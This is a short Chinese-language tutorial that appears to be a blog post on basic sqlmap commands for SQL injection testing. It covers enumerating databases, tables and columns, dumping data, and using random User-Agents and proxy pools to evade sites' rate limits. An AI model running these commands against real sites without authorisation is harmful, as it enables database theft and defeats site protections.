Sqlmap基本操作
Sqlmap是用python2所寫的指令碼程式,用來對Web應用進行“sql注入漏洞”自動化測試
可以說是Web滲透測試“護髮” 利器之一
下面總結一下使用它,對網站測試Sql注入漏洞
最簡單、常用到的指令
一、操作環境
- Windows10
- cmd
- python2.7
二、基本命令
1. 選擇目標網址測試
sqlmap -u 目標網址
2. 確認存在漏洞後,爆破出資料庫
sqlmap -u 目標網址 --dbs
3.選擇一個數據庫,爆破出有多少表
sqlmap -u 目標網址 --tables -D 目標資料庫名
4. 爆破出表中的欄位資訊
sqlmap -u 目標網址 --columns -T 目標表名 -D 目標資料庫名
5. 嘗試破解所選欄位裡的內容,並轉存到本地計算機
sqlmap -u 目標網址 --dump -C 目標欄位 -T 目標表名 -D 目標資料庫名
三、可選,但常用的指令
1.隨機選擇“User-Agent”
某些站點會對過高頻率訪問的使用者
識別他們的“User-Agent”,來做出限制
利用sqlmap自帶的隨機選擇Agent引數,來應對
sqlmap -u 目標 --random-agent
2.選擇代理伺服器,訪問目標
理由同上,網站採取更加嚴格的防護
限制過高頻率訪問的IP地址,對網站的請求
要使用代理,需要自己搭建一個代理池
sqlmap -u --proxy=http://127.0.0.1:埠號
3.破解執行緒設定
sqlmap -u --threads 5
四、總結
實際操作中,經常需要用到“--random-agent”,“--proxy”等指令
原因是,網站通常會對高頻率訪問的使用者,做出一些限制,確保網站能夠正常訪問
這時候我們就需要採用靈活的應對策略
來確保測試的正常進行。
以上這些操作,是目標站點沒有WAF保護時的一些操作。
當然,sql還能做更多。
以後慢慢學習~